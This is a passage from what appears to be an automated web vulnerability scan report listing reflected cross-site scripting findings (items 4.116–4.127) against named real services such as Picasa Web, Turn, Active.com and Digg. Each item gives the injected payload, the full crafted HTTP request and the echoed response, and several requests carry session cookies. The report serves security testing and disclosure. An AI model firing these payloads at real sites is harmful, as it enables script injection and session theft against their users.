Cookie: NID=50=cMjpsScbxYBA86D8h-EH6vhVyPj-fsQRP2Z2YiyE7HQN1XRNmNWJwonTkx9AxfKcEf4kxwysSri20Ay-owIVxtC9Lx0bpNT-EEO0q8JSwNP4MMsti1QTi5LrexkUGf1t; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i

Response

4.116. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [hl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/data/feed/api/user/117176959269632963044/albumid/5547732855143429377

Issue detail

The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12213%3balert(1)//ad3d5b34e0e was submitted in the hl parameter. This input was echoed as 12213;alert(1)//ad3d5b34e0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /data/feed/api/user/117176959269632963044/albumid/5547732855143429377?alt=rss&kind=photo&hl=en_US12213%3balert(1)//ad3d5b34e0e HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=50=cMjpsScbxYBA86D8h-EH6vhVyPj-fsQRP2Z2YiyE7HQN1XRNmNWJwonTkx9AxfKcEf4kxwysSri20Ay-owIVxtC9Lx0bpNT-EEO0q8JSwNP4MMsti1QTi5LrexkUGf1t; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i

Response

HTTP/1.1 400 Bad Request
Expires: Wed, 31 Aug 2011 16:44:06 GMT
Date: Wed, 31 Aug 2011 16:44:06 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 64

Invalid value for hl parameter: en_US12213;alert(1)//ad3d5b34e0e

4.117. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [kind parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/data/feed/api/user/117176959269632963044/albumid/5547732855143429377

Issue detail

The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3441b%3balert(1)//459d8fa95bc was submitted in the kind parameter. This input was echoed as 3441b;alert(1)//459d8fa95bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /data/feed/api/user/117176959269632963044/albumid/5547732855143429377?alt=rss&kind=photo3441b%3balert(1)//459d8fa95bc&hl=en_US HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=50=cMjpsScbxYBA86D8h-EH6vhVyPj-fsQRP2Z2YiyE7HQN1XRNmNWJwonTkx9AxfKcEf4kxwysSri20Ay-owIVxtC9Lx0bpNT-EEO0q8JSwNP4MMsti1QTi5LrexkUGf1t; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i

Response

HTTP/1.1 400 Bad Request
Expires: Wed, 31 Aug 2011 16:44:05 GMT
Date: Wed, 31 Aug 2011 16:44:05 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 66

Invalid value for kind parameter: photo3441b;alert(1)//459d8fa95bc

4.118. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1 was submitted in the name parameter. This input was echoed as 51a7e<x style=x:expression(alert(1))>f4490ed59f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1&sid=3984&xr=2764965424800301950&referer=http%3A%2F%2Fwww.gigya.com%2Fsocial-login%2F HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdj?cat=&name=landing&sid=3984
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 01 Sep 2011 16:14:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1314893689_16771:2; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: uid=1_1314893689_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: kwd=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: sit=1_1314893689_3984:7:2; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: cre=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: bpd=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: apd=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: scg=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: ppd=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: afl=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Set-Cookie: act=1_1314893689; Domain=.fetchback.com; Expires=Tue, 30-Aug-2016 16:14:49 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01 Sep 2011 16:14:49 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

4.119. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef826'%3balert(1)//45f0f864480 was submitted in the admeld_callback parameter. This input was echoed as ef826';alert(1)//45f0f864480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchef826'%3balert(1)//45f0f864480 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/news_atf?t=1313102492008&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; exchange_uid=eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF19; subID="{}"; impressions="{\"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]}"; camp_freq_p1="eJzjkuFYdZxNgFFi8aaJn1gUGDUWX532icWA0QLM5xLh6HoFkt32+89HFgUGDQYDBgsGoGh3M7sAk0QXsigAn+gW4w=="; io_freq_p1="eJzjEueYmizALLF408RPLAoMGgwGjBZgNpcwx+Q0AUaJbb//fIRIMFgwAAA8Rg1P"; dp_rec="{\"1\": 1313102118+ \"2\": 1312767386+ \"4\": 1312767383}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYuHo7GDmYuY4zggACuACCA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 11 Aug 2011 22:42:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 11-Aug-2011 22:42:12 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 245

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchef826';alert(1)//45f0f864480?admeld_adprovider_id=300&external_user_id=1e4cb365-db7a-4e61-9b94-c144934e6ac1&Expiration=1313534552&custom_user_segments=%2C50185%2C199"/>
...[SNIP]...

4.120. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd00"><script>alert(1)</script>514e088d3b5 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=2fd00"><script>alert(1)</script>514e088d3b5&sp=y&admeld_call_type=iframe&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/sports_atf?t=1313102509417&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fsports%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fnational%2F2011%2F08%2F11%2F2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=ZpJrdEN79KVaaQ5x_eL3FriFVzFQRjbqZuIiEmEkxgJd6ISB_q_vS5rapRhLZ6kjIKHTdoQFcnEGwxgyuDK6mMYEzHUV3BWuGGQMNXMTPUYi-lcqLgF2yPb1nOqdrQSkZNkktp95fL-eYxb8nUp4hf9gmMOuZmUyZD0ZCgAchvY; fc=MC2Ys5o9uj6wS4vo7PGZQpZFnDpK-9f0X00NFfncp8qU-vmoT8SSmpEV4YTnQzR74lEwVpJFaLpN4lkZIOxtEb3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=gF_OZi02sHkMMHPHHIT_YjUdxxjya1CTBb7tYIvoHvlWBtowiK_y7rm69etnejt5t3-JBjxUjfsEqhDgETwyDDwTRNScU9OA-NMSZ2AflixtRwy6kr4cqutg991PpoxyOMubf4ymgKy4tF1cmyKQsX5GLb_NYbmytIApyE3bMCCBWZasGw0Mto8_Qqkhdzfi; rv=1; uid=3041410246858069995; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Tue, 07-Feb-2012 22:43:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 11 Aug 2011 22:43:46 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=3992196294787914308&fpid=2fd00"><script>alert(1)</script>514e088d3b5&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.121. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205e7"><script>alert(1)</script>f924f81b73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=205e7"><script>alert(1)</script>f924f81b73c&admeld_call_type=iframe&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/sports_atf?t=1313102509417&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fsports%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fnational%2F2011%2F08%2F11%2F2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=ZpJrdEN79KVaaQ5x_eL3FriFVzFQRjbqZuIiEmEkxgJd6ISB_q_vS5rapRhLZ6kjIKHTdoQFcnEGwxgyuDK6mMYEzHUV3BWuGGQMNXMTPUYi-lcqLgF2yPb1nOqdrQSkZNkktp95fL-eYxb8nUp4hf9gmMOuZmUyZD0ZCgAchvY; fc=MC2Ys5o9uj6wS4vo7PGZQpZFnDpK-9f0X00NFfncp8qU-vmoT8SSmpEV4YTnQzR74lEwVpJFaLpN4lkZIOxtEb3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=gF_OZi02sHkMMHPHHIT_YjUdxxjya1CTBb7tYIvoHvlWBtowiK_y7rm69etnejt5t3-JBjxUjfsEqhDgETwyDDwTRNScU9OA-NMSZ2AflixtRwy6kr4cqutg991PpoxyOMubf4ymgKy4tF1cmyKQsX5GLb_NYbmytIApyE3bMCCBWZasGw0Mto8_Qqkhdzfi; rv=1; uid=3041410246858069995; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Tue, 07-Feb-2012 22:43:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 11 Aug 2011 22:43:46 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=3896107662886327739&fpid=4&nu=n&t=&sp=205e7"><script>alert(1)</script>f924f81b73c&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.122. http://realtime.active.com/widget/active_home [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://realtime.active.com
Path:	/widget/active_home

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload eacc2<script>alert(1)</script>69732fbac36 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/active_home?format=json&city=North%20Branch&state=TX&days=7&channel=&num=6&callback=OX.AJAST.__callbacks__.callback4eacc2<script>alert(1)</script>69732fbac36 HTTP/1.1
Host: realtime.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643; geozip=75244; location=North%20Branch%2C%20TX%2C%20US; locationSetBy=geocode; locationAdditionalInfo=null

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Wed, 31 Aug 2011 18:24:04 GMT
ETag: "4ef7e27e4c0db67499475ffd975debe3"
Server: nginx/0.7.62
X-Runtime: 1300
Content-Length: 8786
Connection: keep-alive

OX.AJAST.__callbacks__.callback4eacc2<script>alert(1)</script>69732fbac36({"upcomingStats":[{"daily_aggregate":{"lon":"-82.6262","tot":"491","url":"http://www.active.com/running/anderson-sc/the-peoples-bank-34th-annual-midnight-flight-2011","startDate":"2011-09-02","advanta
...[SNIP]...

4.123. http://rok.com.com/rok-get [app_handle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rok.com.com
Path:	/rok-get

Issue detail

The value of the app_handle request parameter is copied into the HTML document as plain text between tags. The payload 5c254<script>alert(1)</script>2623adaaaf0 was submitted in the app_handle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:06 GMT
Server: Apache
X-Powered-By: POME, Pyrus
X-Content-Type-Options: nosniff
Pragma: no-cache
Cache-Control: private, max-age=0
Vary: Accept-Encoding
Content-Type: application/javascript; charset=iso-8859-15
Content-Length: 1057

rubicsResponse (
   {
    rubics: {
       meta: {
        timestamp: "2011.08.31.14.49.06.PDT",
        v: "$Name: not supported by cvs2svn $",
        adstamp: "",
        errorText: "Empty ROS response text: _URI=http://rok.com.com/rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json;COULD NOT MAP APP_HANDLE=\"cncnetworkbar5c254scriptalert(1)script2623adaaaf0\" TO APP_ID"
       },
       request: {
        appHandle: "cncnetworkbar5c254scriptalert(1)script2623ad
...[SNIP]...

4.124. http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rok.com.com
Path:	/rok-get

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ce085<script>alert(1)</script>a0bb84065da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=11&wrapper=json&ce085<script>alert(1)</script>a0bb84065da=1 HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:08 GMT
Server: Apache
X-Powered-By: POME, Pyrus
X-Content-Type-Options: nosniff
Pragma: no-cache
Cache-Control: private, max-age=0
Vary: Accept-Encoding
Content-Type: application/javascript; charset=iso-8859-15
Content-Length: 1510

rubicsResponse (
   {
    rubics: {
       meta: {
        timestamp: "2011.08.31.14.49.08.PDT",
        v: "$Name: not supported by cvs2svn $",
        adstamp: "",
        errorText: ""
       },
       request: {
        appHandle: "cncnetworkbar",
        unitSp: "64",
        unitId: "64",
        poolId: "1",
        uri: "http://rok.com.com/rok-get?app_handle=cncnetworkbar&unit_sp=64&site=11&wrapper=json&ce085<script>alert(1)</script>a0bb84065da=1"
       },
       response: {
        bodyText: "<div class=\"rbx-site-promo\" id=\"rbx_cncnetworkbar_main\">
...[SNIP]...

4.125. http://rok.com.com/rok-get [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rok.com.com
Path:	/rok-get

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 65ce0<script>alert(1)</script>da8a56256af was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=1165ce0<script>alert(1)</script>da8a56256af&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:07 GMT
Server: Apache
X-Powered-By: POME, Pyrus
X-Content-Type-Options: nosniff
Pragma: no-cache
Cache-Control: private, max-age=0
Vary: Accept-Encoding
Content-Type: application/javascript; charset=iso-8859-15
Content-Length: 1507

rubicsResponse (
   {
    rubics: {
       meta: {
        timestamp: "2011.08.31.14.49.07.PDT",
        v: "$Name: not supported by cvs2svn $",
        adstamp: "",
        errorText: ""
       },
       request: {
        appHandle: "cncnetworkbar",
        unitSp: "64",
        unitId: "64",
        poolId: "1",
        uri: "http://rok.com.com/rok-get?app_handle=cncnetworkbar&unit_sp=64&site=1165ce0<script>alert(1)</script>da8a56256af&wrapper=json"
       },
       response: {
        bodyText: "<div class=\"rbx-site-promo\" id=\"rbx_cncnetworkbar_main\">
...[SNIP]...

4.126. http://rok.com.com/rok-get [unit_sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rok.com.com
Path:	/rok-get

Issue detail

The value of the unit_sp request parameter is copied into the HTML document as plain text between tags. The payload a6810<script>alert(1)</script>4c046e454a2 was submitted in the unit_sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rok-get?app_handle=cncnetworkbar&unit_sp=64a6810<script>alert(1)</script>4c046e454a2&site=11&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:07 GMT
Server: Apache
X-Powered-By: POME, Pyrus
X-Content-Type-Options: nosniff
Pragma: no-cache
Cache-Control: private, max-age=0
Vary: Accept-Encoding
Content-Type: application/javascript; charset=iso-8859-15
Content-Length: 1060

rubicsResponse (
   {
    rubics: {
       meta: {
        timestamp: "2011.08.31.14.49.07.PDT",
        v: "$Name: not supported by cvs2svn $",
        adstamp: "",
        errorText: "Empty ROS response text: _URI=http://rok.com.com/rok-get?app_handle=cncnetworkbar&unit_sp=64a6810<script>alert(1)</script>4c046e454a2&site=11&wrapper=json;COULD NOT MAP UNIT_ID='64a6810scriptalert(1)script4c046e454a2' TO POOL"
       },
       request: {
        appHandle: "cncnetworkbar",
        unitSp: "64a6810scriptalert(1)script4c046e454a2",

...[SNIP]...

4.127. http://services.digg.com/1.0/endpoint [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.digg.com
Path:	/1.0/endpoint

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a8c53<script>alert(1)</script>8191e201fe7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695a8c53<script>alert(1)</script>8191e201fe7 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 172
Expires: Thu, 01 Sep 2011 16:17:44 GMT
X-Cached: MISS
X-RateLimit-Current: 29
Cache-Control: max-age=300
Date: Thu, 01 Sep 2011 16:12:44 GMT
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3424

